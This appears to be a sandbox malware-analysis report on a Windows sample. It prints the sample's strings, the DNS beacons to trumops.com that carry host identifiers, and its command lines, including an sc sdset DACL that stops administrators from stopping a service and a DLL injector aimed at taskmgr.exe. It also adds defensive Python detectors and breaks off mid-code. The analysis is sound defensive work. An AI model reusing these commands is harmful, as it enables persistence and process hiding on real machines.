Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: unknown network workbuf is emptywww-authenticate initialHeapLive= spinningthreads=%%!%c(big.Int=%s)0123456789ABCDEFX0123456789abcdefx060102150405Z07001192092895507812559604644775390625: missing method ; SameSite=StrictAdjustTokenGroupsCOMPRESSION_ERRORCanSet() is falseCertFindExtensionCreateStdDispatchCryptDecodeObjectDnsRecordListFreeENHANCE_YOUR_CALMEnumThreadWindowsFLE Standard TimeFailed DependencyGC assist markingGMT Standard TimeGTB Standard TimeGetCurrentProcessGetShortPathNameWHEADER_TABLE_SIZEHKEY_CLASSES_ROOTHKEY_CURRENT_USERHTTP_1_1_REQUIREDIf-Modified-SinceIsTokenRestrictedLookupAccountSidWMoved PermanentlyOld_North_ArabianOld_South_ArabianOther_ID_ContinuePython-urllib/2.5ReadProcessMemoryRegLoadMUIStringWSafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenToo Many RequestsTransfer-EncodingUnified_IdeographVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDNbad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcouldn't registercpu name is emptydecryption faileddiscover-electrumelectrumx.soon.itembedded/%s32.sysembedded/%s64.sysenode.duckdns.orgentersyscallblockerbium1.sytes.netexec format errorexec: not startedexponent overflowfile URL is emptyfractional secondgp.waiting != nilhandshake failureif-modified-sinceillegal parameterimpersonation: %win string literalindex > windowEndinteger too largeinvalid bit size invalid stream IDkey align too biglibwww-perl/5.820locked m0 woke upmark - bad statusmarkBits overflowmissing closing )missing closing ]missing extensionnil resource bodyno data availablenotetsleepg on g0permission deniedpseudo-device: %sread revision: %wrecords are emptyreflect.Value.Capreflect.Value.Intreflect.Value.Lenreflect: New(nil)reflect: call of runtime.newosprocruntime: a.base= runtime: b.base= runtime: nameOff runtime: next_gc=runtime: pointer runtime: textOff runtime: typeOff scanobject n == 0seek at 0x%0x: %wseeker can't seekselect (no cases)stack: frame={sp:thread exhaustiontransfer-encodingtruncated headersunknown caller pcwait for GC cyclewine_get_version
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Services, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad message
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 80db53a4564878a8cdff9a7ca652d3fe, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: &gt;&lt;'\'') = ) m=+Inf+inf, n -Inf-inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0.100x%x108020063125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup
Source: csrss.exe Binary or memory string: emoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Val
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8812e937fcebe77983df86ffdfe7a471, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detectParent (exact match): Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, parent state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: 100-continue152587890625762939453125Bidi_ControlCIDR addressCONTINUATIONCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTransitionalTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad Pq valuebad Ta valuebad Tc valuebad Td valuebad Th valuebad Tq valuebad flushGenbad g statusbad g0 stackbad recoverybootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOdse disableddumping heapelectrumx.mlend tracegc
Source: upd.exe, 00000005.00000002.321801363.0000000000FE8000.00000004.00000020.sdmp, upd.exe, 00000008.00000002.350773419.0000000000EC7000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 908ea1a77ea441bcdf0a5b3d829d1614, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6739fa9f684abbea4b2e76cf14a0a1f4, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 23bad0369164ebf4f04ee41a74386028, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe Binary or memory string: releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (defau
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2d446151824b69a919c7d5646f0806b8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe, csrss.exe Binary or memory string: AhomAtoiCDN=CESTChamDATADashDateEESTEtagFromGOGCGoneHEADHKCCHKLMHostJulyJuneLisuMiaoModiNZDTNZSTNameNewaPINGPOSTQEMUROOTSASTStatThaiUUIDWESTXeon"%s"\rss\smb\u00\wup %+v m=] n=agedarchasn1avx2basebindbirdbluebmi1bmi2boldboolbushcallcap cas1cas2cas3cas4cas5cas6
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-62, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, new state: Off

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00007FF7019BE1D4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D9D3C GetProcessHeap, 36_2_00007FF7019D9D3C
Enables debug privileges
Source: C:\Users\user\Desktop\upd.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BD8BC SetUnhandledExceptionFilter,_invalid_parameter_noinfo, 36_2_00007FF7019BD8BC
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE1D4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00007FF7019BE1D4
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019C543C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 36_2_00007FF7019C543C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BE37C SetUnhandledExceptionFilter, 36_2_00007FF7019BE37C
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019BDE24 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 36_2_00007FF7019BDE24

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject threads in other processes
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle, 36_2_00007FF7019B27F0
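The call list above is the textbook remote-thread DLL injection chain: enumerate processes with CreateToolhelp32Snapshot/Process32FirstW/Process32NextW and compare names with lstrcmpiW, then OpenProcess, VirtualAllocEx, WriteProcessMemory and CreateRemoteThread against the match. LoadLibraryW appearing in the same function is consistent with the usual trick of starting the remote thread at LoadLibraryW so the target loads the DLL itself; that matches the command line later in this section, where csrss.exe launches injector.exe with taskmgr.exe and NtQuerySystemInformationHook.dll as arguments (the DLL name suggests a hook on NtQuerySystemInformation, the call Task Manager uses to list processes, but the report does not show the DLL's own behaviour). The following is an added example, not code from the report or the sample: a small triage helper that pulls the API list out of a Joe Sandbox "Code function" line and matches it against ordered stage tables for thread-based and APC-based injection. The stage tables and the dll_injection_hint label are this example's own; REPORT_LINE is copied from the line above.

```python
"""Classify a function's Win32 call list into injection / enumeration primitives.

Added example, not part of the Joe Sandbox report. REPORT_LINE is the
"Code function" line for injector.exe copied from the report; the stage
tables below are this example's own and cover the common thread-based variants.
"""
from typing import Dict, List, Optional, Sequence, Set

REPORT_LINE = (
    r"Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: "
    "36_2_00007FF7019B27F0 CreateMutexW,SleepEx,CreateToolhelp32Snapshot,Process32FirstW,"
    "CloseHandle,lstrcmpiW,Process32NextW,FindCloseChangeNotification,GetLastError,"
    "SetLastError,OpenProcess,GetLastError,VirtualAllocEx,WriteProcessMemory,LoadLibraryW,"
    "CreateRemoteThread,CloseHandle,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle, "
    "36_2_00007FF7019B27F0"
)

# A technique is an ordered list of stages. A stage is satisfied by any one of its
# alternative APIs, and stages must appear in this order (not necessarily adjacent).
STAGES: Dict[str, List[Set[str]]] = {
    "process_enumeration": [
        {"CreateToolhelp32Snapshot"},
        {"Process32First", "Process32FirstW"},
        {"Process32Next", "Process32NextW"},
    ],
    "remote_thread_injection": [
        {"OpenProcess", "NtOpenProcess"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"CreateRemoteThread", "CreateRemoteThreadEx", "NtCreateThreadEx", "RtlCreateUserThread"},
    ],
    "apc_injection": [
        {"OpenProcess", "NtOpenProcess"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"OpenThread", "NtOpenThread"},
        {"QueueUserAPC", "NtQueueApcThread"},
    ],
}

# APIs typically used to point the remote thread at LoadLibrary so the target
# process loads the injected DLL itself (hint only, not proof of DLL injection).
LOADER_HINTS = ("LoadLibraryW", "LoadLibraryA", "GetProcAddress")


def calls_from_report_line(line: str) -> List[str]:
    """Extract the comma-separated API list from a Joe Sandbox "Code function:" line.

    The list is the only whitespace-separated token containing commas, whether it
    comes before or after the function address.
    """
    _, sep, rest = line.partition("Code function:")
    if not sep:
        return []
    for token in rest.split():
        if "," in token:
            return [c for c in token.split(",") if c]
    return []


def match_stages(calls: Sequence[str], stages: Sequence[Set[str]]) -> Optional[List[str]]:
    """Return the call chosen for each stage, in order, or None if a stage never occurs."""
    matched: List[str] = []
    pos = 0
    for stage in stages:
        for i in range(pos, len(calls)):
            if calls[i] in stage:
                matched.append(calls[i])
                pos = i + 1
                break
        else:
            return None
    return matched


def classify(calls: Sequence[str]) -> Dict[str, List[str]]:
    """Map technique name -> the calls that satisfied it; empty dict when nothing matches."""
    hits: Dict[str, List[str]] = {}
    for name, stages in STAGES.items():
        matched = match_stages(calls, stages)
        if matched is not None:
            hits[name] = matched
    if "remote_thread_injection" in hits:
        loaders = [c for c in calls if c in LOADER_HINTS]
        if loaders:
            hits["dll_injection_hint"] = loaders
    return hits


if __name__ == "__main__":
    for technique, chain in classify(calls_from_report_line(REPORT_LINE)).items():
        print(f"{technique}: {' -> '.join(chain)}")
```

Run it over every "Code function" line in a report rather than one at a time; the enumeration-plus-injection pair inside a single function, with a name comparison in between, is a stronger signal than either chain on its own.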
Performs DNS TXT record lookups
Source: Traffic DNS traffic detected: queries for: trumops.com
Source: Traffic DNS traffic detected: queries for: trumops.com
Source: Traffic DNS traffic detected: queries for: logs.trumops.com
Source: Traffic DNS traffic detected: queries for: 442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
Source: Traffic DNS traffic detected: queries for: e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
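The queried names follow a pattern: a bare host identifier as the leftmost label (a UUID under uuid.trumops.com, a 32-hex-character MD5-length value under hash.trumops.com), so the query itself carries data to the operator's nameserver whatever the answer holds; the signature above says these were TXT lookups, though the report does not list the record type per name. The following is an added example, not from the report: a detector over DNS query logs that flags names under a watched zone whose leftmost label is a UUID or a hash-length hex string. The log line format ("timestamp client qtype qname"), the client addresses and the record types in the sample lines are constructed; the query names are those from the report.

```python
"""Flag DNS queries whose leftmost label looks like a host identifier.

Added example, not part of the Joe Sandbox report. The log format
"<timestamp> <client> <qtype> <qname>", the client addresses and the query
types are constructed; the query names come from the report.
"""
import re
from typing import Iterable, List, NamedTuple, Optional, Tuple

# Constructed log lines: the trumops.com names are from the report, the rest is made up.
SAMPLE_LOG = """\
2021-01-01T00:00:01Z 10.0.0.5 A trumops.com
2021-01-01T00:00:02Z 10.0.0.5 A logs.trumops.com
2021-01-01T00:00:03Z 10.0.0.5 TXT 442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.com
2021-01-01T00:00:04Z 10.0.0.5 TXT e0a50c60a85bfbb9ecf45bff0239aaa3.hash.trumops.com
2021-01-01T00:00:05Z 10.0.0.7 A www.example.com
2021-01-01T00:00:06Z 10.0.0.7 TXT _dmarc.example.com
"""

UUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$")
# MD5 (32), SHA-1 (40) and SHA-256 (64) hex digests.
HASH_RE = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$")


class DnsQuery(NamedTuple):
    ts: str
    client: str
    qtype: str
    qname: str


class Finding(NamedTuple):
    client: str
    qtype: str
    qname: str
    zone: str
    label_kind: str  # "uuid" or "hash"


def parse_line(line: str) -> Optional[DnsQuery]:
    """Parse one constructed log line; None for lines that do not fit the format."""
    parts = line.split()
    if len(parts) != 4:
        return None
    return DnsQuery(parts[0], parts[1], parts[2].upper(), parts[3].rstrip(".").lower())


def split_zone(qname: str, zones: Optional[Iterable[str]]) -> Optional[Tuple[List[str], str]]:
    """Return (labels left of the zone, zone), or None if qname is outside every watched zone.

    With zones=None the last two labels are treated as the zone, which is a
    rough approximation (it mishandles names such as example.co.uk).
    """
    labels = qname.split(".")
    if zones is None:
        if len(labels) <= 2:
            return [], qname
        return labels[:-2], ".".join(labels[-2:])
    for zone in zones:
        zone = zone.rstrip(".").lower()
        if qname == zone:
            return [], zone
        if qname.endswith("." + zone):
            return qname[: -len(zone) - 1].split("."), zone
    return None


def classify_label(label: str) -> Optional[str]:
    """Identify a label that is a UUID or a hash-length hex digest."""
    if UUID_RE.match(label):
        return "uuid"
    if HASH_RE.match(label):
        return "hash"
    return None


def find_identifier_queries(lines: Iterable[str], zones: Optional[Iterable[str]] = None) -> List[Finding]:
    """Flag queries under the watched zones whose leftmost label is an identifier."""
    zones = list(zones) if zones is not None else None
    findings: List[Finding] = []
    for line in lines:
        q = parse_line(line)
        if q is None:
            continue
        hit = split_zone(q.qname, zones)
        if hit is None or not hit[0]:
            continue
        labels, zone = hit
        kind = classify_label(labels[0])
        if kind is not None:
            findings.append(Finding(q.client, q.qtype, q.qname, zone, kind))
    return findings


if __name__ == "__main__":
    for f in find_identifier_queries(SAMPLE_LOG.splitlines(), ["trumops.com"]):
        print(f"{f.client} {f.qtype} {f.qname} ({f.label_kind} under {f.zone})")
```

With zones=None the same check runs across all traffic; that is noisier (CDN and telemetry hostnames also use hash-like labels), so in practice pair it with the TXT query type or with a per-client count of distinct identifier labels.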
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process created: C:\Users\user\Desktop\upd.exe C:\Users\user\Desktop\upd.exe -update
Source: C:\Users\user\Desktop\upd.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\windefender.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Progman
Source: csrss.exe, 0000000B.00000002.569661846.0000000032560000.00000002.00020000.sdmp Binary or memory string: Progmanlock
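The sc sdset command above is what the "Suspicious Service DACL Modification" signature fired on. Read as service rights, the Administrators (BA) allow ACE grants CCDCLCSWRPLOCRSDRCWDWO, which is the usual default minus WP (SERVICE_STOP) and DT (SERVICE_PAUSE_CONTINUE), and it is followed by (D;;WPDT;;;BA), an explicit deny of those same two rights. A local administrator can therefore neither stop nor pause the WinDefender service, while SYSTEM keeps full control. The deny ACE sits after the allow ACE, which is non-canonical ordering, but since the allow never grants WP or DT the deny is reached and takes effect either way. BA does keep WD (WRITE_DAC) and SD (DELETE), so from an elevated prompt the descriptor can be rewritten with sc sdset or the service removed with sc delete. The following decoder is an added example, not code from the report: it parses the SDDL string, evaluates single-right access the way Windows walks a DACL (first matching ACE decides, no ACE means deny) and reports what the sample's descriptor takes away relative to a baseline. SAMPLE_SDDL is copied from the command line above; DEFAULT_SERVICE_SDDL is the descriptor Windows assigns to a typical service and is an assumed baseline. Token group membership is ignored, so the result is per named trustee only.

```python
"""Decode a service SDDL descriptor and report what it takes away from Administrators.

Added example, not part of the Joe Sandbox report. SAMPLE_SDDL is copied from the
report's "sc sdset WinDefender" command line; DEFAULT_SERVICE_SDDL is the descriptor
Windows assigns to a typical service and is assumed here as the comparison baseline.
"""
import re
from typing import Dict, List, NamedTuple, Set

SAMPLE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)
# Assumed baseline: the default descriptor of a typical Windows service.
DEFAULT_SERVICE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# SDDL two-letter access rights as they are interpreted for service objects.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}


class Ace(NamedTuple):
    ace_type: str    # "A" allow, "D" deny, "AU" audit
    flags: str       # ACE flags, e.g. "FA" = audit failed access
    rights: Set[str]
    trustee: str     # SDDL alias (BA, SY, IU, SU, WD, ...) or a literal SID


SECTION_RE = re.compile(r"([OGDS]):")   # O:owner G:group D:DACL S:SACL
ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_rights(field: str) -> Set[str]:
    """Expand a run of two-letter rights; a raw hex mask is kept undecoded."""
    if field.startswith("0x"):
        return {field}
    return {SERVICE_RIGHTS.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)}


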